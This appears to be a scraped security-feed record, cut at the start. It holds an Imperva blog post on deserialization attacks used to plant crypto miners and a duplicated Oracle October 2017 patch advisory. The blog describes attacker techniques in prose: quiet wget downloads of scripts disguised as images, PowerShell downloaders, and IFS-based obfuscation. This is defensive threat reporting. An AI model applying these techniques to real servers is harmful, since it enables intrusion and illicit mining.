vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No \nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes \nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Congnos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicate that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, this means that \u201cwget\u201d will have no output to the console, hence it will be harder to note that such a request was even made. Once the downloaded script runs the server is infected with a crypto mining malware trying to mine Monero digital coins (a crypto currency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux server, each system with its designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. The variable is probably used instead of a space to try to make the payload harder to detect.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers that send an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time at the \u201cContent-Type\u201d header.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "modified": "2018-01-24T17:45:08", "published": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2020-10-04T21:16:00", "bulletinFamily": "software", "cvelist": ["CVE-2003-1418", "CVE-2013-0248", "CVE-2013-0255", "CVE-2013-1900", "CVE-2013-1902", "CVE-2013-1903", "CVE-2013-2566", "CVE-2014-0050", "CVE-2014-0060", "CVE-2014-0061", "CVE-2014-0062", "CVE-2014-0063", "CVE-2014-0064", "CVE-2014-0065", "CVE-2014-0066", "CVE-2014-0076", "CVE-2014-0107", "CVE-2014-0114", "CVE-2014-0195", "CVE-2014-0198", "CVE-2014-0221", "CVE-2014-0224", "CVE-2014-3470", "CVE-2014-3538", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-3587", "CVE-2014-3613", "CVE-2014-3707", "CVE-2014-4342", "CVE-2014-4345", "CVE-2014-8275", "CVE-2014-8713", "CVE-2014-8714", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0207", "CVE-2015-0208", "CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0285", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0290", "CVE-2015-0291", "CVE-2015-0292", "CVE-2015-0293", "CVE-2015-0899", "CVE-2015-1787", "CVE-2015-1788", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1791", "CVE-2015-1792", "CVE-2015-1793", "CVE-2015-2808", "CVE-2015-3193", "CVE-2015-3194", "CVE-2015-3195", "CVE-2015-3196", "CVE-2015-3197", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5351", "CVE-2015-7181", "CVE-2015-7182", "CVE-2015-7183", "CVE-2015-7501", "CVE-2015-7575", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-0701", "CVE-2016-0706", "CVE-2016-0714", "CVE-2016-0763", "CVE-2016-10165", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-1950", "CVE-2016-1979", "CVE-2016-2107", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-2834", "CVE-2016-3092", "CVE-2016-3506", "CVE-2016-5019", "CVE-2016-5285", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6305", "CVE-2016-6306", "CVE-2016-6307", "CVE-2016-6308", "CVE-2016-6515", "CVE-2016-6814", "CVE-2016-6816", "CVE-2016-7052", "CVE-2016-7055", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-8735", "CVE-2016-8745", "CVE-2016-9840", "CVE-2016-9841", "CVE-2016-9842", "CVE-2016-9843", "CVE-2017-10014", "CVE-2017-10026", "CVE-2017-10033", "CVE-2017-10034", "CVE-2017-10037", "CVE-2017-10050", "CVE-2017-10051", "CVE-2017-10054", "CVE-2017-10055", "CVE-2017-10060", "CVE-2017-10065", "CVE-2017-10066", "CVE-2017-10077", "CVE-2017-10099", "CVE-2017-10152", "CVE-2017-10153", "CVE-2017-10154", "CVE-2017-10155", "CVE-2017-10158", "CVE-2017-10159", "CVE-2017-10161", "CVE-2017-10162", "CVE-2017-10163", "CVE-2017-10164", "CVE-2017-10165", "CVE-2017-10166", "CVE-2017-10167", "CVE-2017-10190", "CVE-2017-10194", "CVE-2017-10197", "CVE-2017-10203", "CVE-2017-10227", "CVE-2017-10259", "CVE-2017-10260", "CVE-2017-10261", "CVE-2017-10263", "CVE-2017-10264", "CVE-2017-10265", "CVE-2017-10268", "CVE-2017-10270", "CVE-2017-10271", "CVE-2017-10274", "CVE-2017-10275", "CVE-2017-10276", "CVE-2017-10277", "CVE-2017-10279", "CVE-2017-10280", "CVE-2017-10281", "CVE-2017-10283", "CVE-2017-10284", "CVE-2017-10285", "CVE-2017-10286", "CVE-2017-10287", "CVE-2017-10292", "CVE-2017-10293", "CVE-2017-10294", "CVE-2017-10295", "CVE-2017-10296", "CVE-2017-10299", "CVE-2017-10300", "CVE-2017-10302", "CVE-2017-10303", "CVE-2017-10304", "CVE-2017-10306", "CVE-2017-10308", "CVE-2017-10309", "CVE-2017-10310", "CVE-2017-10311", "CVE-2017-10312", "CVE-2017-10313", "CVE-2017-10314", "CVE-2017-10315", "CVE-2017-10316", "CVE-2017-10317", "CVE-2017-10318", "CVE-2017-10319", "CVE-2017-10320", "CVE-2017-10321", "CVE-2017-10322", "CVE-2017-10323", "CVE-2017-10324", "CVE-2017-10325", "CVE-2017-10326", "CVE-2017-10327", "CVE-2017-10328", "CVE-2017-10329", "CVE-2017-10330", "CVE-2017-10331", "CVE-2017-10332", "CVE-2017-10333", "CVE-2017-10334", "CVE-2017-10335", "CVE-2017-10336", "CVE-2017-10337", "CVE-2017-10338", "CVE-2017-10339", "CVE-2017-10340", "CVE-2017-10341", "CVE-2017-10342", "CVE-2017-10343", "CVE-2017-10344", "CVE-2017-10345", "CVE-2017-10346", "CVE-2017-10347", "CVE-2017-10348", "CVE-2017-10349", "CVE-2017-10350", "CVE-2017-10351", "CVE-2017-10352", "CVE-2017-10353", "CVE-2017-10354", "CVE-2017-10355", "CVE-2017-10356", "CVE-2017-10357", "CVE-2017-10358", "CVE-2017-10359", "CVE-2017-10360", "CVE-2017-10361", "CVE-2017-10362", "CVE-2017-10363", "CVE-2017-10364", "CVE-2017-10365", "CVE-2017-10366", "CVE-2017-10367", "CVE-2017-10368", "CVE-2017-10369", "CVE-2017-10370", "CVE-2017-10372", "CVE-2017-10373", "CVE-2017-10375", "CVE-2017-10378", "CVE-2017-10379", "CVE-2017-10380", "CVE-2017-10381", "CVE-2017-10382", "CVE-2017-10383", "CVE-2017-10384", "CVE-2017-10385", "CVE-2017-10386", "CVE-2017-10387", "CVE-2017-10388", "CVE-2017-10389", "CVE-2017-10391", "CVE-2017-10392", "CVE-2017-10393", "CVE-2017-10394", "CVE-2017-10395", "CVE-2017-10396", "CVE-2017-10397", "CVE-2017-10398", "CVE-2017-10399", "CVE-2017-10400", "CVE-2017-10401", "CVE-2017-10402", "CVE-2017-10403", "CVE-2017-10404", "CVE-2017-10405", "CVE-2017-10406", "CVE-2017-10407", "CVE-2017-10408", "CVE-2017-10409", "CVE-2017-10410", "CVE-2017-10411", "CVE-2017-10412", "CVE-2017-10413", "CVE-2017-10414", "CVE-2017-10415", "CVE-2017-10416", "CVE-2017-10417", "CVE-2017-10418", "CVE-2017-10419", "CVE-2017-10420", "CVE-2017-10421", "CVE-2017-10422", "CVE-2017-10423", "CVE-2017-10424", "CVE-2017-10425", "CVE-2017-10426", "CVE-2017-10427", "CVE-2017-10428", "CVE-2017-3167", "CVE-2017-3169", "CVE-2017-3444", "CVE-2017-3445", "CVE-2017-3446", "CVE-2017-3588", "CVE-2017-3730", "CVE-2017-3731", "CVE-2017-3732", "CVE-2017-3733", "CVE-2017-5461", "CVE-2017-5462", "CVE-2017-5662", "CVE-2017-5664", "CVE-2017-5706", "CVE-2017-5709", "CVE-2017-7502", "CVE-2017-7668", "CVE-2017-7679", "CVE-2017-9788", "CVE-2017-9805"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 252 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=187793594395974id=2310031.1>).\n\nPlease note that on September 22, 2017, Oracle released Security Alert for CVE-2017-9805. Customers of affected Oracle product(s) are strongly advised to apply the fixes that were announced in this Security Alert as well as those contained in this Critical Patch update\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available here.\n", "modified": "2018-02-15T00:00:00", "published": "2017-10-17T00:00:00", "id": "ORACLE:CPUOCT2017", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2017", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:21:17", "bulletinFamily": "software", "cvelist": ["CVE-2017-10324", "CVE-2017-10167", "CVE-2017-10014", "CVE-2017-10417", "CVE-2017-10037", "CVE-2015-5351", "CVE-2015-5254", "CVE-2017-10270", "CVE-2017-10387", "CVE-2017-10360", "CVE-2015-1792", "CVE-2017-10321", "CVE-2017-10060", "CVE-2015-0235", "CVE-2015-1793", "CVE-2017-10404", "CVE-2017-10311", "CVE-2017-10421", "CVE-2017-10353", "CVE-2017-10260", "CVE-2017-10203", "CVE-2016-9840", "CVE-2017-10419", "CVE-2017-10424", "CVE-2017-10399", "CVE-2017-10293", "CVE-2015-3197", "CVE-2017-10299", "CVE-2017-10158", "CVE-2017-10379", "CVE-2017-10414", "CVE-2017-10054", "CVE-2017-10357", "CVE-2017-10197", "CVE-2017-10361", "CVE-2017-10356", "CVE-2016-5019", "CVE-2017-10322", "CVE-2017-10323", "CVE-2017-10066", "CVE-2014-3572", "CVE-2017-5709", "CVE-2016-6306", "CVE-2017-5462", "CVE-2014-3613", "CVE-2017-7502", "CVE-2015-7181", "CVE-2015-0206", "CVE-2017-10369", "CVE-2015-1789", "CVE-2016-2183", "CVE-2017-10349", "CVE-2017-10284", "CVE-2017-10294", "CVE-2017-10325", "CVE-2017-10416", "CVE-2015-0286", "CVE-2017-10341", "CVE-2017-10420", "CVE-2017-10418", "CVE-2017-10367", "CVE-2016-2178", "CVE-2017-10164", "CVE-2013-1903", "CVE-2017-10400", "CVE-2017-3167", "CVE-2017-10281", "CVE-2015-3195", "CVE-2017-10351", "CVE-2017-10359", "CVE-2017-10381", "CVE-2017-10406", "CVE-2017-10348", "CVE-2017-10372", "CVE-2014-8714", "CVE-2017-10034", "CVE-2017-10328", "CVE-2016-0714", "CVE-2016-3092", "CVE-2014-3571", "CVE-2017-10397", "CVE-2017-10388", "CVE-2017-10330", "CVE-2017-10407", "CVE-2014-0076", "CVE-2017-10033", "CVE-2017-10342", "CVE-2017-10415", "CVE-2017-10408", "CVE-2016-6302", "CVE-2017-10344", "CVE-2017-10354", "CVE-2017-10338", "CVE-2017-10296", "CVE-2017-10292", "CVE-2017-10402", "CVE-2014-3587", "CVE-2017-10306", "CVE-2017-10365", "CVE-2017-10337", "CVE-2017-10426", "CVE-2016-8745", "CVE-2016-2177", "CVE-2017-10380", "CVE-2015-0288", "CVE-2017-10332", "CVE-2017-10378", "CVE-2014-0224", "CVE-2017-10026", "CVE-2017-10276", "CVE-2016-0635", "CVE-2017-10409", "CVE-2017-10166", "CVE-2017-10427", "CVE-2017-10422", "CVE-2015-3194", "CVE-2017-10355", "CVE-2017-10163", "CVE-2016-6515", "CVE-2017-10326", "CVE-2015-0285", "CVE-2016-2107", "CVE-2017-10153", "CVE-2016-7055", "CVE-2017-10382", "CVE-2015-7501", "CVE-2017-10364", "CVE-2017-10319", "CVE-2015-3253", "CVE-2017-3731", "CVE-2016-6307", "CVE-2016-0701", "CVE-2017-10398", "CVE-2017-10051", "CVE-2017-10308", "CVE-2017-10320", "CVE-2017-10287", "CVE-2017-10412", "CVE-2017-10334", "CVE-2016-9842", "CVE-2016-2834", "CVE-2017-10283", "CVE-2015-0899", "CVE-2017-10152", "CVE-2017-10264", "CVE-2016-1182", "CVE-2014-0065", "CVE-2016-0763", "CVE-2015-0207", "CVE-2017-10155", "CVE-2017-10271", "CVE-2017-10286", "CVE-2017-10304", "CVE-2016-6308", "CVE-2016-6816", "CVE-2016-7433", "CVE-2014-4342", "CVE-2017-5662", "CVE-2014-8275", "CVE-2016-2180", "CVE-2017-10411", "CVE-2017-10313", "CVE-2017-10194", "CVE-2015-7182", "CVE-2015-0208", "CVE-2015-2808", "CVE-2017-10347", "CVE-2014-3570", "CVE-2017-10227", "CVE-2015-7575", "CVE-2017-10370", "CVE-2017-10261", "CVE-2017-10425", "CVE-2017-5706", "CVE-2015-3196", "CVE-2017-10428", "CVE-2014-3470", "CVE-2017-10362", "CVE-2017-10309", "CVE-2016-2181", "CVE-2017-10391", "CVE-2016-6304", "CVE-2015-3193", "CVE-2017-10263", "CVE-2014-3538", "CVE-2017-10403", "CVE-2014-0114", "CVE-2017-10159", "CVE-2017-10410", "CVE-2017-3732", "CVE-2017-10383", "CVE-2017-10339", "CVE-2017-10340", "CVE-2014-0050", "CVE-2017-10327", "CVE-2017-10396", "CVE-2017-10300", "CVE-2014-3707", "CVE-2014-0064", "CVE-2017-10343", "CVE-2015-0293", "CVE-2017-10165", "CVE-2017-10316", "CVE-2017-3445", "CVE-2017-10373", "CVE-2016-1979", "CVE-2017-10363", "CVE-2017-10352", "CVE-2016-2381", "CVE-2014-8713", "CVE-2017-10279", "CVE-2015-7183", "CVE-2013-0255", "CVE-2017-10314", "CVE-2017-9805", "CVE-2015-1788", "CVE-2017-10055", "CVE-2014-0195", "CVE-2014-0198", "CVE-2017-10161", "CVE-2016-7052", "CVE-2015-0209", "CVE-2014-0063", "CVE-2016-1950", "CVE-2017-10333", "CVE-2015-0204", "CVE-2016-0706", "CVE-2013-0248", "CVE-2017-3733", "CVE-2017-5664", "CVE-2017-10312", "CVE-2017-10366", "CVE-2014-0060", "CVE-2017-10318", "CVE-2016-7429", "CVE-2016-1181", "CVE-2017-10268", "CVE-2017-10285", "CVE-2017-3446", "CVE-2017-10392", "CVE-2017-10413", "CVE-2016-9843", "CVE-2013-2566", "CVE-2016-8735", "CVE-2015-1790", "CVE-2017-10394", "CVE-2017-9788", "CVE-2017-10350", "CVE-2016-6305", "CVE-2016-6303", "CVE-2017-10275", "CVE-2017-10274", "CVE-2017-10190", "CVE-2013-1902", "CVE-2017-10315", "CVE-2015-0291", "CVE-2017-10317", "CVE-2017-10389", "CVE-2017-10385", "CVE-2017-10154", "CVE-2017-10395", "CVE-2017-3588", "CVE-2014-4345", "CVE-2017-10162", "CVE-2003-1418", "CVE-2016-2182", "CVE-2017-10358", "CVE-2017-10310", "CVE-2017-10077", "CVE-2017-10346", "CVE-2014-0062", "CVE-2017-10401", "CVE-2015-0287", "CVE-2017-7668", "CVE-2017-3444", "CVE-2017-10295", "CVE-2017-10393", "CVE-2017-10423", "CVE-2017-10280", "CVE-2017-5461", "CVE-2016-10165", "CVE-2014-0066", "CVE-2015-0289", "CVE-2016-9841", "CVE-2015-7940", "CVE-2017-3169", "CVE-2017-10065", "CVE-2016-5285", "CVE-2017-10368", "CVE-2015-0292", "CVE-2017-10375", "CVE-2017-10384", "CVE-2014-0107", "CVE-2017-10050", "CVE-2016-3506", "CVE-2017-10345", "CVE-2017-10303", "CVE-2017-10302", "CVE-2017-10259", "CVE-2017-10265", "CVE-2015-0290", "CVE-2017-3730", "CVE-2015-0205", "CVE-2017-10329", "CVE-2016-2179", "CVE-2017-10405", "CVE-2017-10277", "CVE-2016-6814", "CVE-2013-1900", "CVE-2015-1787", "CVE-2015-4852", "CVE-2014-0061", "CVE-2014-3569", "CVE-2017-10386", "CVE-2015-1791", "CVE-2017-10336", "CVE-2017-10335", "CVE-2016-7431", "CVE-2017-7679", "CVE-2014-0221", "CVE-2017-10331", "CVE-2017-10099"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 252 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2310031.1>).\n\nPlease note that on September 22, 2017, Oracle released [Security Alert for CVE-2017-9805](<http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html>). Customers of affected Oracle product(s) are strongly advised to apply the fixes that were announced in this Security Alert as well as those contained in this Critical Patch update\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2018-02-15T00:00:00", "published": "2017-10-17T00:00:00", "id": "ORACLE:CPUOCT2017-3236626", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2017", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
